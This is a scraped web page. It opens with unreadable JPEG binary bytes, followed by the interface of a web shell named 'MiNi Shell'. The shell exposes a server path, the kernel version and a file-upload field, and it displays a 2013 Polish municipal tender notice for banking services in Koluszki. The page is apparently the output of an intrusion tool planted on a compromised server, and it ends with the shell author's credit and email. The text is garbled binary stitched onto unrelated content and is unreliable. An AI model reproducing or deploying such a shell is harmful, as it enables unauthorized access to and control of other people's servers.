JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131223/279241-N-2013.html

<p class="kh_header"><b>Koluszki: Wykonywanie  bankowej  obsługi  budżetu  Gminy Koluszki  oraz  podległych  jednostek organizacyjnych.</b><br>
<b>Numer ogłoszenia: 279241 - 2013; data zamieszczenia: 23.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie  bankowej  obsługi  budżetu  Gminy Koluszki  oraz  podległych  jednostek organizacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot  zamówienia   obejmuje:
1)  obsługę  bankową  wraz  z systemem  bankowości  elektronicznej   tj. otwarcie 
i   prowadzenie  rachunków  bankowych,  przyjmowanie  wpłat  gotówkowych, 
realizacja  wypłat  gotówkowych, realizacja  przelewów  w  formie elektronicznej, sporządzanie  wyciągów  bankowych, udostępnienie  systemu  bankowości elektronicznej,  wydawanie  blankietów  czeków  gotówkowych,  wydawanie  zaświadczeń i  opinii  bankowych, 
2) udzielenie  kredytu  w  rachunku  budżetu,
3) oprocentowanie  środków  na  rachunkach  Gminy Koluszki  jako  jednostki samorządu terytorialnego,  oraz na rachunkach  jednostek  podległych.
Wykonywanie   bankowej  obsługi  budżetu Gminy  Koluszki  będzie  w szczególności  polegało  na: 
1.  Otwarciu  i  prowadzeniu:
1) rachunków dla Gminy  Koluszki  z siedzibą w Urzędzie  Miejskim w  Koluszkach  tj.: 
  a)  rachunku  budżetu  tzw. organ, 
  b)  rachunków bieżących  jednostek  ( dochody i wydatki ), 
  c)  rachunków pomocniczych,
2) rachunków  bieżących  i  pomocniczych dla  jednostek organizacyjnych Gminy Koluszki,
3) rachunków  bieżących  dla  komitetów  społecznych,  
według  nazw  i wymaganej  ilości  tj. od 140  do 250 rachunków, 
4) rachunku  bankowego  Pracowniczej  Kasy Zapomogowo - Pożyczkowej  przy  Urzędzie  Miasta w Koluszkach,
5) indywidualnych  rachunków  bankowych  dla  płatności  masowych  z  tytułu gospodarki  odpadami - zakłada się  5 500 szt.  rachunków  z możliwością  ich  rozszerzenia do  6 500 szt. Usługa obejmuje wdrażanie  i  obsługę  systemu  identyfikacji  i raportowania  płatności masowych.
2.  Realizacji  poleceń  przelewu  w systemie elektronicznym: 
1) przelewy  wewnętrzne  między  jednostkami  organizacyjnymi  w  ilości:  500 sztuk  / miesiąc. 
2) przelewy  zewnętrzne  do  innych  banków  w  ilości : 7.000 sztuk / miesiąc. 
3. Przyjmowaniu wpłat  i dokonywaniu  wypłat  gotówkowych  we  wskazanej   
    siedzibie  banku  na  terenie  Miasta Koluszki, oraz wydawaniu blankietów  
    czekowych.
1) przyjmowanie  wpłat  gotówkowych  w  ilości  2 500 szt./ miesiąc
2) dokonywanie  wypłat   gotówkowych w  ilości  800 szt./ miesiąc
3) dokonywanie  wypłat  gotówkowych  dla  podopiecznych  Miejsko - Gminnego  Ośrodka Pomocy  Społecznej  w  Koluszkach  w ilości  200 sz. /miesiąc.
4)  wydawania blankietów  czeków gotówkowych - w skali  roku 600 szt.  
4.  Udzielaniu  kredytu  w  rachunku  budżetu  tzw. organ,  przypisanego  Urzędowi   Miejskiemu w Koluszkach,  maksymalnie do  kwoty 1 500.000,00 zł  
( słownie:  jeden milion, pięćset  tysięcy złotych)  przez  okres 95  dni  w  skali każdego  roku.
5. Oprocentowaniu  środków  pieniężnych  na:
a)  lokatach  krótkoterminowych  
Przyjmuje się,  że  średnio  w  każdym  miesiącu  będzie założona  jedna  lokata 
1 - miesięczna  o  wartości  100.000,00 zł   słownie:  sto tysięcy złotych.
b)  lokatach  typu  overnight  
Przyjmuje się, że średnio  w każdym miesiącu  będzie założonych 15 lokat  overnight  
o  wartości:  50.000  zł  (słownie:  pięćdziesiąt  tysięcy  złotych)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4, 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na podstawie  podpisanych  oświadczeń:  o  spełnieniu  warunków  udziału  w  postępowaniu  o  których  mowa  w  art. 22 ust. 1  i  braku  podstaw  do wykluczenia   w oparciu o  art. 24 ust. 1 pkt. 2   Ustawy  Prawo  Zamówień  Publicznych,  oraz  gdy  Wykonawca  załączy  aktualny  odpis  z  właściwego  rejestru  lub  Centralnej  Ewidencji  i  Informacji o  Działalności  Gospodarczej  Rzeczpospolitej Polskiej,  jeżeli odrębne przepisy wymagają  wpisu  do  rejestru lub  ewidencji   wystawionego  nie  wcześniej  niż  6 miesięcy  przed upływem  terminu  składania  ofert  oraz,  gdy Wykonawca  posiada  aktualne zezwolenie  uprawniające  do  wykonywania  czynności  bankowych  wydane przez Komisję  Nadzoru Bankowego zgodnie z ustawą z dnia 29.08.1997 r.  Prawo  Bankowe ( tj. Dz. U. z 2002 r. Nr 72, poz. 665  ze  zmianami ) lub  inne  zezwolenie  potwierdzające, że  Wykonawca  jest  uprawniony  do  wykonywania  czynności  bankowych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek  za  spełniony na podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału w  postępowaniu o  którym mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Ocena  spełnienia warunków  będzie dokonywana  na podstawie złożonych dokumentów  i  oświadczeń na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek  za  spełniony na podstawie podpisanego  oświadczenia  o  spełnieniu  warunków udziału w  postępowaniu  o  którym mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek  za  spełniony na podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału w  postępowaniu  o  którym mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek  za  spełniony na podstawie  podpisanego  oświadczenia  o  spełnieniu warunków udziału w  postępowaniu o którym mowa  
w  art. 22 ust. 1 Ustawy  Prawo  Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na zasadzie spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony  formularz  ofertowy  ( załącznik  nr 1 do  S.I.W.Z. ) 
2) Wypełniony formularz  cen i stawek jednostkowych ( załącznik nr 2 do S.I.W.Z. ),
3) Zezwolenie  uprawniające do wykonywania czynności bankowych  wydane przez Komisję  Nadzoru  Bankowego  zgodnie z ustawą z dnia 29.08.1997 r. Prawo Bankowe ( tj. Dz. U. z 2002 r. Nr 72,  poz. 665  ze zmianami ) lub  inne zezwolenie  potwierdzające, że  Wykonawca  jest  uprawniony do wykonywania  czynności  bankowych.
4) W przypadku, gdy  podmioty występują  wspólnie Wykonawcy  powinni ustanowić  pełnomocnika  do  reprezentowania  ich  w postępowaniu  o udzielenie zamówienia,  albo  reprezentowania  w  postępowaniu  i  zawarcia  umowy  w sprawie zamówienia  publicznego. Pełnomocnictwo powinno być w formie oryginału lub  kopii poświadczonej przez  notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający   dopuszcza  zmianę  postanowień  zawartej  umowy w stosunku do treści oferty, na  podstawie  której  dokonano  wyboru  Wykonawcy  w  następujących 
przypadkach:
a)  gdy  w trakcie  trwania  umowy  zajdzie konieczność  dokonania  zmiany  wynikającej ze zmiany struktury organizacyjnej,  zmiana taka będzie wprowadzona  do umowy
a  Bank  zobowiązany  będzie  obsługę  bankową  realizować  na  zasadach  i  warunkach  niniejszego   zamówienia,
b) zmiany   ilości  otwartych i  prowadzonych  rachunków  na  podstawie pisemnej  dyspozycji  Zamawiającego  otwarcia  rachunku  bez  konieczności  sporządzania  dodatkowego  aneksu  do umowy,
c) w przypadku,  gdy zmiany postanowień zawartej umowy będą  korzystne dla Zamawiającego  a  wynikły  one w  trakcie realizacji  zamówienia.
d) w  innych  uzasadnionych  przypadkach,  gdy  zajdzie  konieczność  wprowadzenia zmian  wynikających  z  okoliczności,  których  nie można  było przewidzieć w chwili zawarcia umowy,  a w szczególności  dotyczących :  wystąpienia siły  wyższej, nałożenia
na Zamawiającego  dodatkowych zadań  lub zmiany  jego  struktury organizacyjnej; pojawienia się  nowych produktów bankowych lub  rozwiązań organizacyjnych,  których wykorzystanie będzie  korzystne dla Zamawiającego, wprowadzenia modyfikacji bądź wymiany systemów informatycznych Zamawiającego,  w  tym systemu finansowo-księgowego,  zmiany przepisów prawa, na podstawie których realizowana jest umowa; W  takim  przypadku,  Zamawiający za zgodą  Banku  wprowadzi  zmiany  w  formie  aneksu do  zawartej  umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Koluszkach przy ul. 11 Listopada 65 pok nr 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2014 godzina 09:30, miejsce: kancelaria Urzędu  Miejskiego w Koluszkach przy ul. 11 Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com